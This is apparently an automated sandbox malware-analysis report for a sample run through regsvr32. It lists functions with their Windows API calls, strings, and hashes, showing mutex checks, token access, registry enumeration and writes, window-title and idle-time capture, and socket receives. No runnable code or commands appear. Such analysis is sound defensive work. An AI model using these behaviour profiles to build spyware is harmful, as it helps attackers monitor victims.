Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Gdip$Image$free$Bitmap_errno$BitsGraphicsHeapPalette$AllocContextCreateDeleteDisposeDrawErrorFormatFreeFromHeightLastLockPixelScan0SizeUnlockWidth_callnewhmallocmemcpy_s
String ID:
API String ID: 1886978121-0
Opcode ID: 42f3f85edf21d4ffff2d38a0cd1d8951f1e28ef6d88c4ef60eeee2c527c753ee
Instruction ID: 66d91d70c9ae6863f464ed651200bde443e10df3f058c9e9072ff219df16f521
Opcode Fuzzy Hash: 42f3f85edf21d4ffff2d38a0cd1d8951f1e28ef6d88c4ef60eeee2c527c753ee
Instruction Fuzzy Hash: 49B1AC723816809ADB20CF25E4487A937A5F748BDCF55BA26DF1A87B54DF38C145C740

Function 02E472D0 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 67
synchronizationsleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 02E472F4
CreateMutexExW.KERNEL32 ref: 02E472FA
Sleep.KERNEL32 ref: 02E47315
CreateMutexW.KERNEL32 ref: 02E47326
GetLastError.KERNEL32 ref: 02E4732C
lstrlenW.KERNEL32 ref: 02E47365
lstrcmpW.KERNEL32 ref: 02E47393
Sleep.KERNEL32 ref: 02E473A2
GetModuleHandleW.KERNEL32 ref: 02E473B3
GetConsoleWindow.KERNEL32 ref: 02E473BE

Strings

2024.12.23, xrefs: 02E472E9, 02E4731B
key, xrefs: 02E47377
open, xrefs: 02E47370

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CreateMutex$Sleep$ConsoleErrorHandleLastModuleWindowlstrcmplstrlen
String ID: 2024.12.23$key$open
API String ID: 4141083079-12241332
Opcode ID: 4a448574df46548b3933a1e0e783c702eebcdd2863c0193c8b969a62963df4fc
Instruction ID: d3f97d4e5748b9fb1af2ef453e273a8e177c0dea8d9e86d6921e044534506674
Opcode Fuzzy Hash: 4a448574df46548b3933a1e0e783c702eebcdd2863c0193c8b969a62963df4fc
Instruction Fuzzy Hash: 1A314F316D4AC1D2EB64AB20F81C3AA7362FB94B8DF80A426D94F469A4DF3CC549C750

Function 02E47D90 Relevance: 15.1, APIs: 10, Instructions: 126COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 02E47DAD
OpenProcess.KERNEL32 ref: 02E47DBD
OpenProcessToken.ADVAPI32 ref: 02E47DE5
CloseHandle.KERNEL32 ref: 02E47DF2
SysStringLen.OLEAUT32 ref: 02E47E40
SysStringLen.OLEAUT32 ref: 02E47E53
CloseHandle.KERNEL32 ref: 02E47EBD
CloseHandle.KERNEL32 ref: 02E47EC6
SysFreeString.OLEAUT32 ref: 02E47EFC
SysFreeString.OLEAUT32 ref: 02E47F39

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: String$CloseHandleProcess$FreeOpen$CurrentToken
String ID:
API String ID: 3697972778-0
Opcode ID: 250c813f0b5ac911f241f73868ced926d4be8b2829d6ef28bc566a87a8018372
Instruction ID: 1d14ffee0c33aade91067a685cd83c8831385f2e8fa62beb41c76f1041d09981
Opcode Fuzzy Hash: 250c813f0b5ac911f241f73868ced926d4be8b2829d6ef28bc566a87a8018372
Instruction Fuzzy Hash: A1418426245B8082EF249F62F414369B365FB84F9CF489229DE9E4BB94DF3CC844C790

Function 00007FFE0141A9C8 Relevance: 15.1, APIs: 10, Instructions: 121memorysynchronizationCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FFE0141A9DF
HeapFree.KERNEL32 ref: 00007FFE0141A9F9
CloseHandle.KERNEL32 ref: 00007FFE0141AAA7
CloseHandle.KERNEL32 ref: 00007FFE0141AB43
WaitForSingleObject.KERNEL32 ref: 00007FFE0141AF0E
GetLastError.KERNEL32 ref: 00007FFE0141AF17
HeapFree.KERNEL32 ref: 00007FFE0141AF39
HeapFree.KERNEL32 ref: 00007FFE0141AF5C
CloseHandle.KERNEL32 ref: 00007FFE0141AFBC
CloseHandle.KERNEL32 ref: 00007FFE0141AFC5

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: CloseFreeHandleHeap$ErrorLastObjectSingleWait
String ID:
API String ID: 3984667017-0
Opcode ID: ae832000e4d5b84c8e2cc288269573d7b94e1ae3fa4238091a51589e4ef0ec96
Instruction ID: 3dd9aa1496f97a9a32e14885b6585a89c8be2718c9bf89b4ad183fc1e14238f0
Opcode Fuzzy Hash: ae832000e4d5b84c8e2cc288269573d7b94e1ae3fa4238091a51589e4ef0ec96
Instruction Fuzzy Hash: C6516B22A08BC588E7619F22D8553F927A0FB48798F544535EE4D4FABACF7CE189C341

Function 02E47860 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 117registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 02E478C9
RegQueryInfoKeyW.ADVAPI32 ref: 02E47924
RegEnumKeyExW.ADVAPI32 ref: 02E479B9
lstrlenW.KERNEL32 ref: 02E479C3
lstrlenW.KERNEL32 ref: 02E479D2

Part of subcall function 02E55F08: _errno.LIBCMT ref: 02E55F27
Part of subcall function 02E55F08: _invalid_parameter_noinfo.LIBCMT ref: 02E55F33

Part of subcall function 02E55F08: _errno.LIBCMT ref: 02E55F7D

RegCloseKey.ADVAPI32 ref: 02E47A1B
lstrlenW.KERNEL32 ref: 02E47A38

Strings

Software\Tencent\Plugin\VAS, xrefs: 02E478AD

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: lstrlen$_errno$CloseEnumInfoOpenQuery_invalid_parameter_noinfo
String ID: Software\Tencent\Plugin\VAS
API String ID: 47975445-3343197220
Opcode ID: 36ec62b793e39dcc94c07c2d0a1f741258fd71675ca2a9683c074fb8b423db42
Instruction ID: 72728858919acd129b661596023f732348312c1f27ce2c6af6e32f96d956fe76
Opcode Fuzzy Hash: 36ec62b793e39dcc94c07c2d0a1f741258fd71675ca2a9683c074fb8b423db42
Instruction Fuzzy Hash: 00515D32658B9186EB60CF25F89439EB3A5F788748F905126EE8D53E58DF38C249CB40

Function 00007FFE0141A0C0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 230COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FFE0141A268
memcpy.MSVCRT ref: 00007FFE0141A27B
memcpy.MSVCRT ref: 00007FFE0141A292
memcpy.MSVCRT ref: 00007FFE0141A2AB
memcpy.MSVCRT ref: 00007FFE0141A2EC
memcpy.MSVCRT ref: 00007FFE0141A307

Strings

assertion failed: old_left_len + count <= CAPACITY, xrefs: 00007FFE0141A4D2
called `Result::unwrap()` on an `Err` value, xrefs: 00007FFE0141B092, 00007FFE0141B0C6, 00007FFE0141B0FA

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: old_left_len + count <= CAPACITY$called `Result::unwrap()` on an `Err` value
API String ID: 3510742995-3830370267
Opcode ID: 0be42b2556445bb09c952e3b13c963e2539a1abc12cecaa0e440c9bddaa7ff3e
Instruction ID: 10e9d4f69c109c95b9b271bf13ecc5d9541f0c16ac4c0127acc4f85e1d5e3f18
Opcode Fuzzy Hash: 0be42b2556445bb09c952e3b13c963e2539a1abc12cecaa0e440c9bddaa7ff3e
Instruction Fuzzy Hash: F4C1EF62A19BC582EB458F18E8013E97768FBA8B98F559336DE4D17371DF3CA295C300

Function 00007FFE0140ADF0 Relevance: 12.2, APIs: 8, Instructions: 177memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0140B160: HeapFree.KERNEL32 ref: 00007FFE0140B288

CreateFileW.KERNEL32 ref: 00007FFE0140AF78
GetLastError.KERNEL32 ref: 00007FFE0140AF94
SetFileInformationByHandle.KERNEL32 ref: 00007FFE0140AFBD
HeapFree.KERNEL32 ref: 00007FFE0140AFDA
GetLastError.KERNEL32 ref: 00007FFE0140AFE9
HeapFree.KERNEL32 ref: 00007FFE0140B015
GetLastError.KERNEL32 ref: 00007FFE0140B02E
CloseHandle.KERNEL32 ref: 00007FFE0140B040

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: ErrorFreeHeapLast$FileHandle$CloseCreateInformation
String ID:
API String ID: 2929975209-0
Opcode ID: b7855a69a751110b45b332f1cdd604192b24ec0a0a63d171e564b8c00f180edb
Instruction ID: 8824eeff7a585ccfd612bc9c9bd7764fba6087cbd8d050f401c085aacfc52e9f
Opcode Fuzzy Hash: b7855a69a751110b45b332f1cdd604192b24ec0a0a63d171e564b8c00f180edb
Instruction Fuzzy Hash: 4661D3A1A0835246FB62CAA391503BD27A1AF48794F24453CDE4D0FAF5DF3DEC958740

Function 00007FFE0141AA10 Relevance: 12.1, APIs: 8, Instructions: 105memorysynchronizationCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFE0141AAA7
CloseHandle.KERNEL32 ref: 00007FFE0141AB43
WaitForSingleObject.KERNEL32 ref: 00007FFE0141AF0E
GetLastError.KERNEL32 ref: 00007FFE0141AF17
HeapFree.KERNEL32 ref: 00007FFE0141AF39
HeapFree.KERNEL32 ref: 00007FFE0141AF5C
CloseHandle.KERNEL32 ref: 00007FFE0141AFBC
CloseHandle.KERNEL32 ref: 00007FFE0141AFC5
GetLastError.KERNEL32 ref: 00007FFE0141B01E

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: CloseHandle$ErrorFreeHeapLast$ObjectSingleWait
String ID:
API String ID: 908592504-0
Opcode ID: d47432c2f7303df1da0f5c878d0d6920ede9d163825c0ac3bba153f5b009ff54
Instruction ID: 47076f7aa2f30509f193a15e7d6a7de5e05d64804b35a4a61a849ce61d9232a8
Opcode Fuzzy Hash: d47432c2f7303df1da0f5c878d0d6920ede9d163825c0ac3bba153f5b009ff54
Instruction Fuzzy Hash: 96412622A09BC688E7619F21D8543E927A0FB5879CF544536EE4D0FAB9CF7CD189C341

Function 02E4EA30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 02E55378: malloc.LIBCMT ref: 02E55392

GetLastInputInfo.USER32 ref: 02E4EA7A
GetTickCount.KERNEL32 ref: 02E4EA80
wsprintfW.USER32 ref: 02E4EAB4
GetForegroundWindow.USER32 ref: 02E4EABA
GetWindowTextW.USER32 ref: 02E4EAD2

Strings

%d min, xrefs: 02E4EAAD

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Window$CountForegroundInfoInputLastTextTickmallocwsprintf
String ID: %d min
API String ID: 4179731349-1947832151
Opcode ID: 40337b7360b93958c7ffefbf7603324078d7470535306a49e8a517b9f1626132
Instruction ID: 3c907794b309fdfdcb4487a41108c101073e733f5c1c5cc082d7d2d98cb2aae7
Opcode Fuzzy Hash: 40337b7360b93958c7ffefbf7603324078d7470535306a49e8a517b9f1626132
Instruction Fuzzy Hash: 6341AE326546909ADB34DF26F4A839ABBA1F785B88F489429DE4E07B58DF3CC505CB40

Function 00007FFE0141B2E0 Relevance: 10.1, APIs: 8, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE0141B346
GetLastError.KERNEL32 ref: 00007FFE0141B3B1
CloseHandle.KERNEL32 ref: 00007FFE0141B40A
CloseHandle.KERNEL32 ref: 00007FFE0141B413
HeapFree.KERNEL32 ref: 00007FFE0141B470
CloseHandle.KERNEL32 ref: 00007FFE0141B481
CloseHandle.KERNEL32 ref: 00007FFE0141B48A
HeapFree.KERNEL32 ref: 00007FFE0141B49C

Memory Dump Source

Source File: 00000005.00000002.2927951746.00007FFE013D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE013D0000, based on PE: true

Associated: 00000005.00000002.2927934110.00007FFE013D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2927993145.00007FFE01442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01443000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928011168.00007FFE01470000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928054254.00007FFE01476000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928071715.00007FFE01477000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928088613.00007FFE01478000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2928105686.00007FFE0147B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe013d0000_regsvr32.jbxd

Similarity

API ID: CloseHandle$ErrorFreeHeapLast
String ID:
API String ID: 2056089037-0
Opcode ID: ee6063b8c0c8a36d35db1be0777e42751f27219dfca506171b1c6d5839785bf6
Instruction ID: 46bcbe1efe66cbc25e5d9f2c649257e7e05ac6ba01f71744cc0fc2c58872478a
Opcode Fuzzy Hash: ee6063b8c0c8a36d35db1be0777e42751f27219dfca506171b1c6d5839785bf6
Instruction Fuzzy Hash: 13417A22A08B4185EB24DB22D5513BD66B0FF98B84F448531EE9E4F7B6DF3CE5818341

Function 02E48310 Relevance: 9.1, APIs: 6, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 02E48375
RegQueryValueExW.ADVAPI32 ref: 02E483BD
lstrcmpW.KERNEL32 ref: 02E483D3
RegCloseKey.ADVAPI32 ref: 02E483FC
RegCloseKey.ADVAPI32 ref: 02E48407

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Close$OpenQueryValuelstrcmp
String ID:
API String ID: 4288439342-0
Opcode ID: 43d7abf421c986796ffab67def199f110ce2357268e7baf3c27bcbaffcd6d8c5
Instruction ID: c9e9dba66310a3fe70b796cc23a9fee80a6d358e0e4e8cf35cd46c192e7a7b6d
Opcode Fuzzy Hash: 43d7abf421c986796ffab67def199f110ce2357268e7baf3c27bcbaffcd6d8c5
Instruction Fuzzy Hash: 04211031358A8085EB60DF25F88875A7360FB95BD8F506225AE9E43B98DF38C445CB44

Function 02E5576C Relevance: 9.1, APIs: 6, Instructions: 63threadCOMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E55797
_invalid_parameter_noinfo.LIBCMT ref: 02E557A2
_getptd.LIBCMT ref: 02E557C8
CreateThread.KERNEL32 ref: 02E5581D
GetLastError.KERNEL32 ref: 02E55828
free.LIBCMT ref: 02E55833

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
String ID:
API String ID: 3283625137-0
Opcode ID: ef76c9431adcd85a319d1e57cb9e2ef9ae5cf1fbd286b1b05233d4a8e7f6675d
Instruction ID: 48b84e88f9676773e658e32e70aaeb890e587d3ba7c47b21d3cbb20002e0ae23
Opcode Fuzzy Hash: ef76c9431adcd85a319d1e57cb9e2ef9ae5cf1fbd286b1b05233d4a8e7f6675d
Instruction Fuzzy Hash: A521C33135479086EB14EBA6E94036EB3A5FB84BD8F849225EF6903B94CF7CC054CB00

Function 028794DC Relevance: 7.6, APIs: 5, Instructions: 98threadCOMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 02879507
_invalid_parameter_noinfo.LIBCMT ref: 02879512
_getptd.LIBCMT ref: 02879538
CreateThread.KERNEL32 ref: 0287958D
free.LIBCMT ref: 028795A3

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: CreateThread_errno_getptd_invalid_parameter_noinfofree
String ID:
API String ID: 2643549960-0
Opcode ID: 453820257ce1fff315e0438df434a3e86e327e415de7a00954c981deddcdb116
Instruction ID: cbcb1e075556678ad81ad20f759b8f97d758c9788f1944a245751132a3512dcd
Opcode Fuzzy Hash: 453820257ce1fff315e0438df434a3e86e327e415de7a00954c981deddcdb116
Instruction Fuzzy Hash: E7218338618F494FEB44FBAC984963A77D2FB98354F00062ED45DC32A1EB70D8418B93

Function 02E4D920 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 02E4D989
RegQueryValueExW.ADVAPI32 ref: 02E4D9B3

Strings

IpDatespecial, xrefs: 02E4D9A4
Console, xrefs: 02E4D963

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: OpenQueryValue
String ID: Console$IpDatespecial
API String ID: 4153817207-1840232981
Opcode ID: f597642ce5486d2b0d97fa684612b1f2a97d83d6342d12bdc6a07c867f32ff83
Instruction ID: 2ee302557798fbbb852014cb33bb75186e3420b922cd5511bfc997a6f05f6619
Opcode Fuzzy Hash: f597642ce5486d2b0d97fa684612b1f2a97d83d6342d12bdc6a07c867f32ff83
Instruction Fuzzy Hash: 41218E33748AA099E7618B61F848B9D7774F74879CF849122EF9813B58DF78C25ACB00

Function 02876682 Relevance: 6.1, APIs: 4, Instructions: 110registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32 ref: 028766EC
RegDeleteValueW.KERNEL32 ref: 028766FE
RegSetValueExW.KERNEL32 ref: 02876726
RegCloseKey.KERNEL32 ref: 02876731

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: Value$CloseDeleteOpen
String ID:
API String ID: 3183427449-0
Opcode ID: 9eba34af8f0cbeb91a26e19318741d303626d94de1ef3866bf452a77ba39d573
Instruction ID: 95da609d96ae522aec07ea8764e0c9ea1f9ba2638ae8a73c5f0439ef8dcb6ae2
Opcode Fuzzy Hash: 9eba34af8f0cbeb91a26e19318741d303626d94de1ef3866bf452a77ba39d573
Instruction Fuzzy Hash: 3331893460CB088FE748EF28D8986DA77E6FB84345F504A6DE15AC32A4EF78D545CB42

Function 02873690 Relevance: 6.1, APIs: 4, Instructions: 109networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 0287374B
_errno.LIBCMT ref: 02873757
_errno.LIBCMT ref: 02873761
_errno.LIBCMT ref: 0287376E

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _errno$recv
String ID:
API String ID: 3923354822-0
Opcode ID: 1f23e9d9fa7af0716f6a083ae6ddab70585528aebc875222d6f22b148e6198e8
Instruction ID: f7677b537ecd853c093894719e7b035aa097657ce7e8bac3d74d1d7a040c49ef
Opcode Fuzzy Hash: 1f23e9d9fa7af0716f6a083ae6ddab70585528aebc875222d6f22b148e6198e8
Instruction Fuzzy Hash: BD316FB8218A488FDBA5EF2C848876A72E2FB88345F0546BDD44EC7290DF34C4419B57

Function 02E49AF0 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 02E49B2A
GetProcessImageFileNameW.PSAPI ref: 02E49B46
CloseHandle.KERNEL32 ref: 02E49B53
CloseHandle.KERNEL32 ref: 02E49B71

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CloseHandleProcess$FileImageNameOpen
String ID:
API String ID: 93767460-0
Opcode ID: f4c9a00bd5335a512c6e2cdfdcb9c4e881643e77e15c2ea394c83688fc739c2e
Instruction ID: b41bc15ccc5017aa3c5be7d8384c2a216789f7b6ac7513c8296e5757990cfd88
Opcode Fuzzy Hash: f4c9a00bd5335a512c6e2cdfdcb9c4e881643e77e15c2ea394c83688fc739c2e
Instruction Fuzzy Hash: 2D01256135478182EF24DB26F4AC3576391BB99BD8F44A1348E4E97B45EF3DC045C714

Function 02E432E0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 02E4331D
CancelIo.KERNEL32 ref: 02E4332A
closesocket.WS2_32 ref: 02E4333A
SetEvent.KERNEL32 ref: 02E43344

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CancelEventclosesocketsetsockopt
String ID:
API String ID: 852421847-0
Opcode ID: 03eef7d3bc33077443603d47114998edeb02d6415146c2d3186012465a948f41
Instruction ID: c1a5f7d032e13fe38c4d75bc28b63830402773aee4a4358cb44e638c3eddcaba
Opcode Fuzzy Hash: 03eef7d3bc33077443603d47114998edeb02d6415146c2d3186012465a948f41
Instruction Fuzzy Hash: 92F03736201B8183D7248F25F55C35AB331F789BA8F644325DBBA07AA4CF39C0698B40

Function 028780E0 Relevance: 4.7, APIs: 3, Instructions: 216COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 02878114

Part of subcall function 02879128: malloc.LIBCMT ref: 02879142

SleepEx.KERNEL32 ref: 0287828D

Part of subcall function 028792D0: _errno.LIBCMT ref: 028792EF
Part of subcall function 028792D0: _invalid_parameter_noinfo.LIBCMT ref: 028792FB

Part of subcall function 028792D0: _errno.LIBCMT ref: 0287932B

SleepEx.KERNEL32 ref: 02878334

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: Sleep$_errno$_invalid_parameter_noinfomalloc
String ID:
API String ID: 3746343157-0
Opcode ID: ec7ef44a993b08f6b2c9ca4519243014c8a3f5e72dcfe9431d6523b78c690dc4
Instruction ID: 35e578e6f857c5e32abb00751b690772e3fb498f9d50b0c1625de6bb5ad7c757
Opcode Fuzzy Hash: ec7ef44a993b08f6b2c9ca4519243014c8a3f5e72dcfe9431d6523b78c690dc4
Instruction Fuzzy Hash: E6619934228B488FE755EF28DC95AA977E5FB99300F50852AD44BC32A0DF38D941DB83

Function 02E4FC40 Relevance: 4.7, APIs: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 02E4FCB6
RegEnumValueW.ADVAPI32 ref: 02E4FD67

Part of subcall function 02E55378: malloc.LIBCMT ref: 02E55392

Part of subcall function 02E55378: _callnewh.LIBCMT ref: 02E55386
Part of subcall function 02E55378: std::exception::exception.LIBCMT ref: 02E553FF

RegCloseKey.ADVAPI32 ref: 02E4FF30

Memory Dump Source

